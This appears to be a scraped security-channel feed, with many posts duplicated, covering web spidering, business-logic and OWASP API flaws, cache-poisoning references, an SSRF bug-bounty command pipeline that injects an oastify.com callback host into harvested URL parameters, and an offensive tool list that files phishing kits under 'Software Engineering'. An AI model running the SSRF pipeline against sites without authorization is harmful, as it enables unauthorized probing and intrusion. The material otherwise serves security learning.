Spidering NIMA?
* Spidering - bu veb-sayt xaritasini tuzish va har qanday foydalanuvchi kirishi mumkin bo'lgan barcha sahifalarni aniqlash usulidir.
* Bu qanday amalga oshiriladi?
* Active
* Active spideringda har bir havola va tugmani bosiladi va har bir shakl maydonini to'ldiriladi. Malum bir tool yoki dastur orqali (BurpSuite, ZAP) har bir sahifani kuzatishda davom etiladi.
* Bu xavfli bo'lishi mumkin, chunki agar vosita administrator sahifasini topsa va foydalanuvchilarni o'chiradigan yoki sahifalarni o'chiruvchi tugmani yuborsa, hujum sifatida ko'rilishi mumkin.
* Passiv
* Passiv spidering - u xuddi faol kabi ishlaydi, ammo keyingi yangi sahifalarni avtomatik tarzda aniqlamaydi. Passiv faoldan ko'ra xavfsizroq bo'ladi.
* Spidering bir necha muhim sabablarga ko'ra veb-sahifadagi zaifliklarni tekshirishdan oldin amalga oshirilishi kerak.
* Veb-sayt xaritasini yaratish avtomatlashtirilgan vositalarga har qanday zaif sahifani aniqlash imkoniyatini beradi.
* Shuningdek, u pentesterga veb-saytning yaxshiroq tasvirini beradi.
* Spidering oddiy foydalanuvchilar uchun mavjud bo'lmasligi kerak bo'lgan sahifalarni ham aniqlashi mumkin.
* Administrator konsollari va tugallanmagan sahifalar. Yoki maxfiy ma'lumotlarni o'z ichiga olgan sahifalar.
* Spidering veb-ilovalarni pentest qilishda muhim jarayonlardan biridir.
#WEB_APP #Pentesting #Spidering
* Spidering - bu veb-sayt xaritasini tuzish va har qanday foydalanuvchi kirishi mumkin bo'lgan barcha sahifalarni aniqlash usulidir.
* Bu qanday amalga oshiriladi?
* Active
* Active spideringda har bir havola va tugmani bosiladi va har bir shakl maydonini to'ldiriladi. Malum bir tool yoki dastur orqali (BurpSuite, ZAP) har bir sahifani kuzatishda davom etiladi.
* Bu xavfli bo'lishi mumkin, chunki agar vosita administrator sahifasini topsa va foydalanuvchilarni o'chiradigan yoki sahifalarni o'chiruvchi tugmani yuborsa, hujum sifatida ko'rilishi mumkin.
* Passiv
* Passiv spidering - u xuddi faol kabi ishlaydi, ammo keyingi yangi sahifalarni avtomatik tarzda aniqlamaydi. Passiv faoldan ko'ra xavfsizroq bo'ladi.
* Spidering bir necha muhim sabablarga ko'ra veb-sahifadagi zaifliklarni tekshirishdan oldin amalga oshirilishi kerak.
* Veb-sayt xaritasini yaratish avtomatlashtirilgan vositalarga har qanday zaif sahifani aniqlash imkoniyatini beradi.
* Shuningdek, u pentesterga veb-saytning yaxshiroq tasvirini beradi.
* Spidering oddiy foydalanuvchilar uchun mavjud bo'lmasligi kerak bo'lgan sahifalarni ham aniqlashi mumkin.
* Administrator konsollari va tugallanmagan sahifalar. Yoki maxfiy ma'lumotlarni o'z ichiga olgan sahifalar.
* Spidering veb-ilovalarni pentest qilishda muhim jarayonlardan biridir.
#WEB_APP #Pentesting #Spidering
Top Business Logic Vulnerability in Web.pdf
4.9 MB
👾 Уязвимости в бизнес-логике веб-приложений.
• Password reset broken logic;
• 2FA broken logic;
• Excessive trust in client-side controls;
• High-level logic vulnerability;
• Inconsistent security controls;
• Flawed enforcement of business rules;
• Low-level logic flaw;
• Inconsistent handling of exceptional input;
• Weak isolation on dual-use endpoint;
• Insufficient workflow validation;
• Authentication bypass via flawed state machine;
• Infinite money logic flaw;
• Authentication bypass via encryption oracle.
• Password reset broken logic;
• 2FA broken logic;
• Excessive trust in client-side controls;
• High-level logic vulnerability;
• Inconsistent security controls;
• Flawed enforcement of business rules;
• Low-level logic flaw;
• Inconsistent handling of exceptional input;
• Weak isolation on dual-use endpoint;
• Insufficient workflow validation;
• Authentication bypass via flawed state machine;
• Infinite money logic flaw;
• Authentication bypass via encryption oracle.
🔥1
OWASP Top 10 API 2023.pdf
930.8 KB
🔝 OWASP API Security Top 10 2023.
• API1:2023 - Broken Object Level Authorization;
• API2:2023 - Broken Authentication;
• API3:2023 - Broken Object Property Level Authorization;
• API4:2023 - Unrestricted Resource Consumption;
• API5:2023 - Broken Function Level Authorization;
• API6:2023 - Unrestricted Access to Sensitive Business Flows;
• API7:2023 - Server Side Request Forgery;
• API8:2023 - Security Misconfiguration;
• API9:2023 - Improper Inventory Management;
• API10:2023 - Unsafe Consumption of APIs.
• API1:2023 - Broken Object Level Authorization;
• API2:2023 - Broken Authentication;
• API3:2023 - Broken Object Property Level Authorization;
• API4:2023 - Unrestricted Resource Consumption;
• API5:2023 - Broken Function Level Authorization;
• API6:2023 - Unrestricted Access to Sensitive Business Flows;
• API7:2023 - Server Side Request Forgery;
• API8:2023 - Security Misconfiguration;
• API9:2023 - Improper Inventory Management;
• API10:2023 - Unsafe Consumption of APIs.
🔥1
Cache Poisoning and Cache Deception.pdf
567.6 KB
References —>
https://portswigger.net/web-security/web-cache-poisoning
https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities
https://hackerone.com/reports/593712
https://youst.in/posts/cache-poisoning-at-scale/
https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9
https://portswigger.net/web-security/web-cache-poisoning
https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities
https://hackerone.com/reports/593712
https://youst.in/posts/cache-poisoning-at-scale/
https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9
🔥1
💰 Bug Bounty Tips for SSRF 💰
#BugBounty #Pentesting
Step 1: Subdomain Enumeration
* DNS Dumpster
* Sublist3r
* Amass
* Certificate Transparency Logs
* subdomainer
Step 2: Find Live Domains
cat all-domains.txt | httpx > all-live.txt
Step 3: Identify All URLs
cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt
Step 4: Injection Burp Collabrator URL in Parameters
cat /home/user/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt
Step 5: Test for SSRF Vulnerabilities
cat ssrf.txt | httpx -fr
Step 6: How to check which URL is vulnerable
split -l 10 ssrf.txt output_file_#BugBounty #Pentesting
💥 Cybersecurity Tools By Category
Information Gathering:
>Nmap
>Shodan
>Maltego
>TheHavester
>Recon-NG
>Amass
>Censys
>OSINT Framework
>Gobuster
Exploitation:
>Burp Suite
>Metasploit Framework
>SQL Map
>ZAP
>ExploitDB
>Core Impact
>Cobalt Strike
Password Cracking:
>John The Ripper
>Hydra
>Hashcat
>OPHCrack
>Medusa
>THC-Hydra
>Cain & Abel
Vulnerability Scanning:
>OpenVAS
>Nessus
>AppScan
>LYNIS
>Retina
>Nexpose
Software Engineering:
>GoPhish
>HiddenEye
>SocialFish
>EvilURL
>Evilginx
Forensics:
>SluethKit
>Autopsy
>Volatility
>Guymager
>Foremost
>Binwalk
>Wireshark
Wireless Hacking:
>Aircrack-NG
>Wifite
>Kismet
>TCPDump
>Airsnort
>Netstumbler
>Reaver
Web Application Assessment:
>OWASP ZAP
>Burp Suite
>Nikto
>ZAP
>WPScan
>Gobuster
>App Spider
Information Gathering:
>Nmap
>Shodan
>Maltego
>TheHavester
>Recon-NG
>Amass
>Censys
>OSINT Framework
>Gobuster
Exploitation:
>Burp Suite
>Metasploit Framework
>SQL Map
>ZAP
>ExploitDB
>Core Impact
>Cobalt Strike
Password Cracking:
>John The Ripper
>Hydra
>Hashcat
>OPHCrack
>Medusa
>THC-Hydra
>Cain & Abel
Vulnerability Scanning:
>OpenVAS
>Nessus
>AppScan
>LYNIS
>Retina
>Nexpose
Software Engineering:
>GoPhish
>HiddenEye
>SocialFish
>EvilURL
>Evilginx
Forensics:
>SluethKit
>Autopsy
>Volatility
>Guymager
>Foremost
>Binwalk
>Wireshark
Wireless Hacking:
>Aircrack-NG
>Wifite
>Kismet
>TCPDump
>Airsnort
>Netstumbler
>Reaver
Web Application Assessment:
>OWASP ZAP
>Burp Suite
>Nikto
>ZAP
>WPScan
>Gobuster
>App Spider
👍2